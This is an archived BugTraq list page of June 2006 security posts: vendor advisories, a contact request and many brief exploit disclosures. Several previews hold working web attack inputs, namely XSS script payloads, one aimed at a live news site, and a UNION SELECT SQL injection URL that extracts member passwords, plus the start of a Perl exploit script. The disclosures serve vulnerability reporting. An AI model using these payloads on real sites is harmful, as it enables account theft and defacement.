BugTraq (Page 1115 of 1748)
Janus Contact 2006-06-19
Charles Hamby (fixer gci net)
Does anyone know a good contact address for the security folks at the Janus Capital Group (www.janus.com)?

Input Validation/Output Encoding Vulnerabilities in Cisco CallManager Allow Script Injection Attacks 2006-06-19
Reynolds, Jake (Jake Reynolds fishnetsecurity com)
I. SYNOPSIS

Release Date: 07/19/2006

Affected Application: Cisco CallManager 3.1 and up (versions prior to 3.1 were not tested but may
still be vulnerable)

Severity If Exploited: High

Impact: Arbitrary configuration of phone system/Theft of individual phone users' credentials

Mitigating Factors

Vm ware 0day dos exploit by n00b. 2006-06-18
co296 aol com
Credits: n00b

email : co296 (at) aol (dot) com

Erm, was wondering if you could take a close look at this. It is a 0day dos exploit by me I found tonight in vmware. I have even debug for you guys to take a look at. I hope you guys will put it up after checking through it. Ok the first thing is vmware us

V3Chat Instant Messenger - XSS 2006-06-17
luny youfucktard com
V3 Chat Instant Messenger

http://www.v3chat.com/

Affected files:

/mail/index.php

/mail/reply.php

is_online.php

online.php

profile.php

profileview.php

search.php

mycontacts.php

expire.php

* Editing your profile:

- input boxes

------------------------------------------

Mai

qtofilemanager xss attack ! 2006-06-18
alijsb yahoo com
+vendor : http://www.qto.com

+poral : qto file manager

+version : All version !

Exploit:

+http://www.xxx.xom/qto/index.php?msg=[xss]

Dragons Kingdom v1.0 - XSS & cookie disclosure 2006-06-18
luny youfucktard com
Dragons Kingdom Script v1.0

Homepage:

http://www.dkscript.com/

Affected files:

*Sending mail:

- Sending in-game mail

*Character Profiles:

- All input boxes of the profile

* Posting & Replying in the forum:

- Posting in the forum

- Replying in the forum

* Form spoofing can

Re: PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities 2006-06-19
stormhacker hotmail com
Hey

look at this

http://www.securityfocus.com/archive/1/428976

I found these bugs on Mar 27 2006

http://www.worlddefacers.de/Public/WD-TMPLH.txt

singapore gallery <= 0.10.0 Multiple Vulnerabilities 2006-06-18
simo64 gmail com
Product : singapore gallery

Versions : 0.10.0 and prior

Site : http://www.sgal.org/

Discovered By : Moroccan Security Research Team (Simo64)

Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid

.:r00tkita - s4mi - Silitix - tahat

Easy CMS 0.1.2 Php Shell Upload Vulnerabilities 2006-06-18
liz0 bsdmail com
Easy CMS 0.1.2 Php Shell Upload Vulnerabilities

----------------------------------------------------

site:http://sourceforge.net/projects/php-easy-cms/

demo:http://www.easy-cms.be/

--------------------------------------------------

Bug:

1)http://victim/choose_file.php

Documents

onedotoh xss atack 2006-06-18
alijsb yahoo com
vendor: http://onedotoh.sourceforge.net

version : all version :D !

exploit:

http://www.xxx.xom/fm/index.php?msg=xxs

++++++

[ GLSA 200606-21 ] Mozilla Thunderbird: Multiple vulnerabilities 2006-06-19
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ GLSA 200606-20 ] Typespeed: Remote execution of arbitrary code 2006-06-19
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

SaphpLesson<<--1.1 "misc.php" SQL injection 2006-06-19
CrAzY CrAcKeR hotmail com
=============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/misc.php?action=[SQL]

VBZooM <<--V1.00 "lng.php" SQL injection 2006-06-19
CrAzY CrAcKeR hotmail com
=============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/lng.php?QuranID=[SQL]

vuBB <= 0.2.1 [BFA] SQL Injection Exploit + Advisory link 2006-06-18
gmdarkfig gmail com
#!/usr/bin/perl

#

# by DarkFig -- acid-root.new.fr

# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt

#

use IO::Socket;

use LWP::Simple;

# Header

print "\r\n+-------------------------------

VBZooM <<--V1.11 "message.php" SQL injection 2006-06-19
CrAzY CrAcKeR hotmail com
=============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/message.php?UserID=[SQ

VBZooM <<--V1.00 "rank.php" SQL injection 2006-06-19
CrAzY CrAcKeR hotmail com
=============================================

Discovered By: CrAzY CrAcKeR

Site: www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/rank.php?MemberID=[SQL

e107 v0.7.5 XSS 2006-06-18
securityconnection gmail com
http://target.xx/search.php?q=&r=0&s=Search&in=1&ex=1&ep=%27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&be=1&t=1&adv=1&type=all&on=new&time=any&author=

------------------

Submit comment

Subject: '><script>alert(/XSS/)</script>

Click Reply to this, your comment.

Ellipsis Security

http

PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities 2006-06-19
selfar2002 hotmail com
------------------------------------------------------------------------
---

PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities

------------------------------------------------------------------------
---

Discovered By SnIpEr_SA

Author : SnIpEr_SA

Remote : Yes

Local : No

Criti

XSS Vulnerability in Maximus SchoolMAX 2006-06-18
Fixer (fixer gci net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The InfoGuard Group Vulnerability Summary 2006-04

Application: Maximus' iCue and iParent (http://www.schoolmax.net)
Versions: All
Bugs: Cross-Site Scripting (XSS)
Date: 18 June 2006
Author: Charles H.
E-mail: charles

Re: [MajorSecurity #17] SixCMS <= 6 - Multiple XSS and directory traversal vulnerabilities 2006-06-19
ellinger six de
As of Version SixCMS 6.0.6patch2 this Bug is fixed. The patch can be downloaded from our support site.

[security bulletin] HPSBTU02116 SSRT061135 rev.2 - HP Tru64 UNIX and HP Internet Express for Tru64 UNIX Running sendmail, Remote Execution of Arbitrary Code or Denial of Service (DoS) 2006-06-19
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00692635
Version: 2

HPSBTU02116 SSRT061135 rev.2 - HP Tru64 UNIX and HP Internet Express for Tru64 UNIX
Running sendmail, Remote Execution of Arbitrary Code or Denial of Service (DoS)

NOTICE: Th

Microsoft Excel 0-day Vulnerability FAQ document written 2006-06-18
Juha-Matti Laurio (juha-matti laurio netti fi)
I have written a FAQ document including 23 items about the new Excel 0-day vulnerability exploited by a Trojan.

The document, entitled Microsoft Excel 0-day Vulnerability FAQ, is located at
http://blogs.securiteam.com/index.php/archives/451

Permalink-type URL to the FAQ is http://blogs.securiteam.com

WeBBoA Hosting Script SQL Injection 2006-06-18
entrika_fs yahoo com
# There is SQL injection in WeBBoA Hosting Script

# Risk=High

Exploit:

http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul
_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1

# Credit: EntriKa

MPCS v0.2 - XSS 2006-06-17
luny youfucktard com
MPCS v0.2

Homepage:

http://tpvgames.co.uk/mpcs

Affected files:

comment.php

XSS vuln with cookie & full path disclosure:

Direct HTML injection doesn't seem to work, however, if you navigate to the code below in your browser, and then post a comment on the same page, our XSS

example w

XSS in http://www.newscientist.com/ - Search 2006-06-16
viz security gmail com


We from Black Box Magazine - Underground Inet-Security Research -- http://bboxnet.mine.nu

found Cross Site Scripting Vuln in http://www.newscientist.com/

Write this example in Search:

"><img src=javascript:a=/Defaced%20by%20Black%20Box%20Magazine/><img src=javascript:alert(a.source)>

mp3.com - Cross site scripting vulnerability 2006-06-16
admin majorsecurity de
mp3.com - Cross site scripting vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 15th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

vbzoom V1.11 forum.php SQL Injection Vulnerabilities 2006-06-16
KARKOR23 hotmail com
Discovered By CrAsh_oVeR_rIdE

Vbzoom SQL Injection

site:www.vbzoom.com

Vulnerable: vbzoom V1.11

vulnerable files:forum.php

exploit:

http://www.sitname.com/vz/forum.php?UserID=1&MainID=[sql]&Page=1

--------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

E-mail:KARKOR

Copyright 2010, SecurityFocus